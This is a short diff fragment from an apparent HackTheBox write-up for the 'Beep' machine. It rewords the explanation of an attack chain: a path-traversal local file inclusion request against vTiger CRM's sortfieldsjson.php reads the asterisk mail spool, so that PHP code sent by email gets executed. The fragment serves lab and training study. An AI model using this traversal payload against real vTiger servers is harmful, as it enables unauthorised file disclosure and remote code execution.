babbadeckl/HackTheBox-Writeups/Beep/README.md

 Connection closed by foreign host.
 ```

-Afterwards we can check if the email was successfully sent:
+Afterwards we can check if the email was successfully sent and received:

 ```
 GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
 ```

-We can actually see the email that we just sent via SMTP:
+With the LFI, we can leak the email that we have just sent.
+This also means, that our PHP code now gets executed!

 ```
 From babbadeckl@pwn.com  Wed Jan 13 22:48:18 2021